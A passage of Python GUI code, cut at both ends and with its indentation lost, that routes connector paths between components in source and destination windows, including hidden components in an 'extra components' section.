path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDist)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2],
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDist)
elif compHiddenOnRight:
if srcPoints[1][0] < srcWinRect[0] + srcWinRect[2] + srcECSWidth: # Not hidden yet but close
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
elif srcPoints[1][0] - srcPadding < srcWinRect[0] + srcWinRect[2] + srcECSWidth:
left = srcPoints[1]
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth, left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDist)
else:
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] + vDist)
# Destination
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = dstWinRect[0] + dstWinRect[2] + ecEnterDist + 30 - dstPadding # 30 is max pad
compHiddenOnLeft = dstPoints[1][0] - dstPadding < leftPausePoint
compHiddenOnRight = dstPoints[1][0] - dstPadding > dstWinRect[0] + dstWinRect[2] + \
dstECSWidth - ecEnterDist
if compHiddenOnLeft:
if dstPoints[2][0] + dstPadding > dstWinRect[0] + dstWinRect[2]:
# For smoother animation. Not hidden yet
bottom = dstPoints[3]
right = dstPoints[2]
left = dstPoints[1]
if left[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(leftPausePoint, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif right[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(leftPausePoint, bottom[1])
arrival = (leftPausePoint, bottom[1])
direction = 3
elif right[0] + dstPadding > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(leftPausePoint, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] + dstPadding > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(dstWinRect[0] + dstWinRect[2], right[1])
arrival = (dstWinRect[0] + dstWinRect[2], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(dstWinRect[0] + dstWinRect[2],
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2], dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
direction = 2
elif compHiddenOnRight:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
if dstPoints[1][0] < dstWinRect[0] + dstWinRect[2] + dstECSWidth: # Not hidden yet but close
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif dstPoints[1][0] - dstPadding < dstWinRect[0] + dstWinRect[2] + dstECSWidth:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
direction = 1
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
direction = 1
else:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
boundingRect = path.boundingRect()
return path, arrival, direction, boundingRect
# ---------------------- #
# --- NEIGHBORING WINDOWS --- #
# We only have special cases when the components are on the inside halves of the neighboring windows
# or if they are extra components
elif numWin == 0:
if dstPoints[0][1] > srcPoints[0][1]: # Dst is below src
if ((srcInECSection or srcCompCenter[1] > srcWinRect[1] + srcWinRect[3] / 2)
and (dstInECSection or dstCompCenter[1] < dstWinRect[1] + dstWinRect[3] / 2)):
if srcInECSection:
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = srcWinRect[0] + srcWinRect[2] + ecEnterDist + 30 - srcPadding # 30 is max pad
compHiddenOnLeft = srcPoints[1][0] - srcPadding < leftPausePoint
compHiddenOnRight = srcPoints[1][0] - srcPadding > srcWinRect[0] + srcWinRect[2] + \
srcECSWidth - ecEnterDist
if compHiddenOnLeft:
if srcPoints[2][0] + srcPadding > srcWinRect[0] + srcWinRect[2]:
bottom = srcPoints[3]
right = srcPoints[2]
left = srcPoints[1]
if left[0] > leftPausePoint:
path.moveTo(left[0], left[1])
path.lineTo(leftPausePoint, left[1])
path.lineTo(leftPausePoint, dstWinRect[1] - vDistDst)
elif right[0] > leftPausePoint:
path.moveTo(leftPausePoint, bottom[1])
path.lineTo(leftPausePoint, dstWinRect[1] - vDistDst)
elif right[0] + srcPadding > leftPausePoint:
path.moveTo(right[0], right[1])
path.lineTo(leftPausePoint, right[1])
path.lineTo(leftPausePoint, dstWinRect[1] - vDistDst)
elif right[0] + srcPadding > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, dstWinRect[1] - vDistDst)
elif right[0] > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2],
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
elif compHiddenOnRight:
if srcPoints[1][0] < srcWinRect[0] + srcWinRect[2] + srcECSWidth:
# Not hidden yet but close
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
elif srcPoints[1][0] - srcPadding < srcWinRect[0] + srcWinRect[2] + srcECSWidth:
left = srcPoints[1]
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth, left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
dstWinRect[1] - vDistDst)
else:
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, dstWinRect[1] - vDistDst)
else: # Src Comp in bottom half of its win
path.moveTo(srcPoints[3][0], srcPoints[3][1])
path.lineTo(srcPoints[3][0], dstWinRect[1] - vDistDst)
# Destination
if dstInECSection:
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = dstWinRect[0] + dstWinRect[2] + ecEnterDist + 30 - dstPadding # 30 is max pad
compHiddenOnLeft = dstPoints[1][0] - dstPadding < leftPausePoint
compHiddenOnRight = dstPoints[1][0] - dstPadding > dstWinRect[0] + dstWinRect[2] + \
dstECSWidth - ecEnterDist
if compHiddenOnLeft:
if dstPoints[2][0] + dstPadding > dstWinRect[0] + dstWinRect[2]:
# For smoother animation. Not hidden yet
top = dstPoints[0]
right = dstPoints[2]
left = dstPoints[1]
if left[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] - vDistDst)
path.lineTo(leftPausePoint, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif right[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] - vDistDst)
path.lineTo(leftPausePoint, top[1])
arrival = (leftPausePoint, top[1])
direction = 0
elif right[0] + dstPadding > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] - vDistDst)
path.lineTo(leftPausePoint, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] + dstPadding > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(right[0] + dstPadding, dstWinRect[1] - vDistDst)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(dstWinRect[0] + dstWinRect[2], right[1])
arrival = (dstWinRect[0] + dstWinRect[2], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + ecHiddenHeight)
path.lineTo(dstWinRect[0] + dstWinRect[2],
dstWinRect[1] + ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2],
dstWinRect[1] + ecHiddenHeight)
direction = 2
elif compHiddenOnRight:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] - vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + ecHiddenHeight)
if dstPoints[1][0] < dstWinRect[0] + dstWinRect[2] + dstECSWidth: # Not hidden yet but close
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif dstPoints[1][0] - dstPadding < dstWinRect[0] + dstWinRect[2] + dstECSWidth:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
direction = 1
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + ecHiddenHeight)
direction = 1
else:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] - vDistDst)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
else: # Dst Comp in top half of its win
path.lineTo(dstPoints[0][0], dstWinRect[1] - vDistDst)
path.lineTo(dstPoints[0][0], dstPoints[0][1])
arrival = (dstPoints[0][0], dstPoints[0][1])
direction = 0
boundingRect = path.boundingRect()
return path, arrival, direction, boundingRect
# Dst above src
else:
if ((srcInECSection or srcCompCenter[1] <= srcWinRect[1] + srcWinRect[3] / 2)
and (dstInECSection or dstCompCenter[1] >= dstWinRect[1] + dstWinRect[3] / 2)):
if srcInECSection:
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = srcWinRect[0] + srcWinRect[2] + ecEnterDist + 30 - srcPadding # 30 is max pad
compHiddenOnLeft = srcPoints[1][0] - srcPadding < leftPausePoint
compHiddenOnRight = srcPoints[1][0] - srcPadding > srcWinRect[0] + srcWinRect[2] + \
srcECSWidth - ecEnterDist
if compHiddenOnLeft:
if srcPoints[2][0] + srcPadding >= srcWinRect[0] + srcWinRect[2]:
bottom = srcPoints[3]
right = srcPoints[2]
left = srcPoints[1]
if left[0] > leftPausePoint:
path.moveTo(left[0], left[1])
path.lineTo(leftPausePoint, left[1])
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDistDst)
elif right[0] > leftPausePoint:
path.moveTo(leftPausePoint, bottom[1])
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDistDst)
elif right[0] + srcPadding > leftPausePoint:
path.moveTo(right[0], right[1])
path.lineTo(leftPausePoint, right[1])
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDistDst)
elif right[0] + srcPadding > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, dstWinRect[1] + dstWinRect[3] + vDistDst)
elif right[0] > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2], srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist, srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
elif compHiddenOnRight:
if srcPoints[1][0] < srcWinRect[0] + srcWinRect[2] + srcECSWidth:
# Not hidden yet but close
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + ecHiddenHeight)
elif srcPoints[1][0] - srcPadding < srcWinRect[0] + srcWinRect[2] + srcECSWidth:
left = srcPoints[1]
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth, left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + ecHiddenHeight)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth, srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
else:
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, dstWinRect[1] + dstWinRect[3] + vDistDst)
else: # Src Comp in top half of its win
path.moveTo(srcPoints[0][0], srcPoints[0][1])
path.lineTo(srcPoints[0][0], dstWinRect[1] + dstWinRect[3] + vDistDst)
# Destination
if dstInECSection:
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = dstWinRect[0] + dstWinRect[2] + ecEnterDist + 30 - dstPadding # 30 is max pad
compHiddenOnLeft = dstPoints[1][0] - dstPadding < leftPausePoint
compHiddenOnRight = dstPoints[1][0] - dstPadding > dstWinRect[0] + dstWinRect[2] + \
dstECSWidth - ecEnterDist
if compHiddenOnLeft:
if dstPoints[2][0] + dstPadding > dstWinRect[0] + dstWinRect[2]:
# For smoother animation. Not hidden yet
bottom = dstPoints[3]
right = dstPoints[2]
left = dstPoints[1]
if left[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(leftPausePoint, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif right[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(leftPausePoint, bottom[1])
arrival = (leftPausePoint, bottom[1])
direction = 3
elif right[0] + dstPadding > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(leftPausePoint, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] + dstPadding > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(dstWinRect[0] + dstWinRect[2], right[1])
arrival = (dstWinRect[0] + dstWinRect[2], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(dstWinRect[0] + dstWinRect[2],
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2], dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
direction = 2
elif compHiddenOnRight:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
if dstPoints[1][0] < dstWinRect[0] + dstWinRect[2] + dstECSWidth:
# Not hidden yet but close
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif dstPoints[1][0] - dstPadding < dstWinRect[0] + dstWinRect[2] + dstECSWidth:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
direction = 1
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
direction = 1
else:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
else: # Dst Comp in bottom half of its win
path.lineTo(dstPoints[3][0], dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(dstPoints[3][0], dstPoints[3][1])
arrival = (dstPoints[3][0], dstPoints[3][1])
direction = 3
boundingRect = path.boundingRect()
return path, arrival, direction, boundingRect
# ------------------------ #
# --- LEAVING SOURCE --- #
if not srcInECSection:
# If in left 6th of containing window, exit through left
if srcCompCenter[0] <= srcWinRect[0] + srcWinRect[2] / 6:
left = srcPoints[1] # x, y coordinate tuple
path.moveTo(left[0], left[1])
path.lineTo(srcWinRect[0] - hDist, left[1])
# Else if in top half of window, exit through top, and go left
elif srcCompCenter[1] <= srcWinRect[1] + srcWinRect[3] / 2:
top = srcPoints[0]
path.moveTo(top[0], top[1])
path.lineTo(top[0], srcWinRect[1] - vDistSrc)
path.lineTo(srcWinRect[0] - hDist, srcWinRect[1] - vDistSrc)
# Else in bottom half of window, exit through bottom, and go left
elif srcCompCenter[1] > srcWinRect[1] + srcWinRect[3] / 2:
bottom = srcPoints[3]
path.moveTo(bottom[0], bottom[1])
path.lineTo(bottom[0], srcWinRect[1] + srcWinRect[3] + vDistSrc)
path.lineTo(srcWinRect[0] - hDist, srcWinRect[1] + srcWinRect[3] + vDistSrc)
else:
raise Exception("Src: This shouldn't happen.")
# In Extra Components Section
else:
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = srcWinRect[0] + srcWinRect[2] + ecEnterDist + 30 - srcPadding # 30 is max pad
compHiddenOnLeft = srcPoints[1][0] - srcPadding < leftPausePoint
compHiddenOnRight = srcPoints[1][0] - srcPadding > srcWinRect[0] + srcWinRect[2] + \
srcECSWidth - ecEnterDist
if dstPoints[0][1] > srcPoints[0][1]: # If destination is below source
if compHiddenOnLeft:
if srcPoints[2][0] + srcPadding > srcWinRect[0] + srcWinRect[2]:
bottom = srcPoints[3]
right = srcPoints[2]
left = srcPoints[1]
if left[0] > leftPausePoint:
path.moveTo(left[0], left[1])
path.lineTo(leftPausePoint, left[1])
path.lineTo(leftPausePoint, srcWinRect[1] + srcWinRect[3] + vDistSrc)
elif right[0] > leftPausePoint:
path.moveTo(leftPausePoint, bottom[1])
path.lineTo(leftPausePoint, srcWinRect[1] + srcWinRect[3] + vDistSrc)
elif right[0] + srcPadding > leftPausePoint:
path.moveTo(right[0], right[1])
path.lineTo(leftPausePoint, right[1])
path.lineTo(leftPausePoint, srcWinRect[1] + srcWinRect[3] + vDistSrc)
elif right[0] + srcPadding > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] + vDistSrc)
elif right[0] > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDistSrc)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDistSrc)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2], srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDistSrc)
path.lineTo(srcWinRect[0] - hDist, srcWinRect[1] + srcWinRect[3] + vDistSrc)
elif compHiddenOnRight:
if srcPoints[1][0] < srcWinRect[0] + srcWinRect[2] + srcECSWidth: # Not hidden yet but close
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
elif srcPoints[1][0] - srcPadding < srcWinRect[0] + srcWinRect[2] + srcECSWidth:
left = srcPoints[1]
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth, left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
